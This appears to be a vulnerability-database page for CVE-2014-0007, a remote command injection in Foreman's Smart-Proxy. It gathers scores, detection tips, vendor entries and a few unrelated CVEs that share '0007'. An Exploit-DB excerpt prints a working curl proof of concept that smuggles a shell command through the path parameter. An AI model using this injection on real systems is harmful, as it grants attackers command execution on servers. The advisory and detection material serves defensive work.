CVE-2014-0007
published 2014-06-20CVE-2014-0007: The Smart-Proxy in Foreman before 1.4.5 and 1.5.x before 1.5.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the path…
PriorityP263high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
9.02%
94.6th percentile
The Smart-Proxy in Foreman before 1.4.5 and 1.5.x before 1.5.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the path parameter to tftp/fetch_boot_file.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| theforeman | foreman | <= 1.4.4 | — |
| theforeman | foreman | — | — |
| theforeman | foreman | — | — |
| theforeman | foreman | — | — |
| theforeman | foreman | — | — |
| theforeman | foreman | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Look for HTTP POST requests to /tftp/fetch_boot_file containing shell metacharacters (e.g., semicolons, URL-encoded as %3B) in the 'path' query parameter, indicating command injection attempts. ↗
- →Monitor for POST requests to the Foreman Smart-Proxy endpoint on port 8443 with Accept: application/json header and a 'path' parameter containing URL-encoded shell metacharacters such as %3B (semicolon). ↗
- →The vulnerable code path is in tftp.rb within the smart-proxy; monitor for unexpected process spawning from the foreman-proxy user, especially shell commands not initiated by normal TFTP boot file fetch operations. ↗
- ·Affected versions are Foreman before 1.4.5 and 1.5.x before 1.5.1; ensure foreman-proxy is patched to 1.4.5+ or 1.5.1+ to remediate. ↗
- ·Exploitation runs with the privileges of the foreman-proxy user; assess the privilege level of this account in your environment to gauge blast radius. ↗
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
foreman-proxy: smart-proxy remote command injection
vendor_redhat·2014-06-18·CVSS 7.5
CVE-2014-0007 [HIGH] CWE-78 foreman-proxy: smart-proxy remote command injection
foreman-proxy: smart-proxy remote command injection
The Smart-Proxy in Foreman before 1.4.5 and 1.5.x before 1.5.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the path parameter to tftp/fetch_boot_file.
Package: foreman-proxy (Red Hat Enterprise Linux OpenStack Platform 5 (Icehouse)) - Affected
GHSA
GHSA-4ffx-rh24-gpxh: The Smart-Proxy in Foreman before 1
ghsa_unreviewed·2022-05-17
CVE-2014-0007 [HIGH] GHSA-4ffx-rh24-gpxh: The Smart-Proxy in Foreman before 1
The Smart-Proxy in Foreman before 1.4.5 and 1.5.x before 1.5.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the path parameter to tftp/fetch_boot_file.
No detection rules found.
Exploit-DB
SAP NetWeaver Enqueue Server - Denial of Service
exploitdb·2014-10-17·CVSS 5.0
CVE-2014-0995 [MEDIUM] SAP NetWeaver Enqueue Server - Denial of Service
SAP NetWeaver Enqueue Server - Denial of Service
---
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
SAP Netweaver Enqueue Server Trace Pattern Denial of Service Vulnerability
1. **Advisory Information**
Title: SAP Netweaver Enqueue Server Trace Pattern Denial of Service
Vulnerability
Advisory ID: CORE-2014-0007
Advisory URL:
http://www.coresecurity.com/advisories/sap-netweaver-enqueue-server-trace-pattern-denial-service-vulnerability
Date published: 2014-10-15
Date of last update: 2014-10-15
Vendors contacted: SAP
Release mode: Coordinated release
2. **Vulnerability Information***
*
Class: Uncontrolled Recursion [CWE-674]
Impact: Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2014-0995
3. **Vulnerability Description**
SAP Netw
Exploit-DB
Foreman Smart-Proxy - Remote Command Injection
exploitdb·2014-06-05
CVE-2014-0007 Foreman Smart-Proxy - Remote Command Injection
Foreman Smart-Proxy - Remote Command Injection
---
source: https://www.securityfocus.com/bid/68117/info
Foreman is prone to a remote command-injection vulnerability.
Successful exploits will result in the execution of arbitrary commands with the privileges of the user running foreman-proxy.
curl -3 -H "Accept:application/json" -k -X POST -d "dummy=exploit" 'https://www.example.com:8443/tftp/fetch_boot_file?prefix=a&path=%3Btouch%20%2Ftmp%2Fbusted%3B'
Bugzilla
CVE-2014-8097 xorg-x11-server: out of bounds access due to not validating length or offset values in DBE extension
bugzilla·2014-11-27·CVSS 6.5
CVE-2014-8097 [MEDIUM] CVE-2014-8097 xorg-x11-server: out of bounds access due to not validating length or offset values in DBE extension
CVE-2014-8097 xorg-x11-server: out of bounds access due to not validating length or offset values in DBE extension
ProcDbeSwapBuffers() and SProcDbeSwapBuffers() DBE extension calls do not check that the lengths and/or indexes sent by the
client are within the bounds specified by the caller or the bounds of
the memory allocated to hold the request read from the client, so could
read or write past the bounds of allocated memory while processing the
request. These calls all occur only after a client has successfully
authenticated itself.
Introduced in X11R6.1 (1996).
Discussion:
Created attachment 962137
0007-dbe_unvalidated_lengths_in_DbeSwapBuffers_calls_CVE-2014-8097.patch
---
Integer overflow causing OOB read and crash. Could also result in OOB data being sent to the client, result
Bugzilla
CVE-2014-0007 foreman-proxy: smart-proxy remote command injection
bugzilla·2014-06-06·CVSS 7.5
CVE-2014-0007 [HIGH] CVE-2014-0007 foreman-proxy: smart-proxy remote command injection
CVE-2014-0007 foreman-proxy: smart-proxy remote command injection
Lukas Zap of Red Hat reports:
The smart proxy contains a check in tftp.rb to ensure that a specific web URL
exists and is valid, this check is vulnerable to a command injection
vulnerability.
Discussion:
Public via: http://projects.theforeman.org/issues/6086
---
Acknowledgements:
This issue was discovered by Lukas Zapletal of Red Hat.
---
This issue has been addressed in following products:
OpenStack 4 for RHEL 6
OpenStack 3 for RHEL 6
Via RHSA-2014:0770 https://rhn.redhat.com/errata/RHSA-2014-0770.html
2014-06-20
Published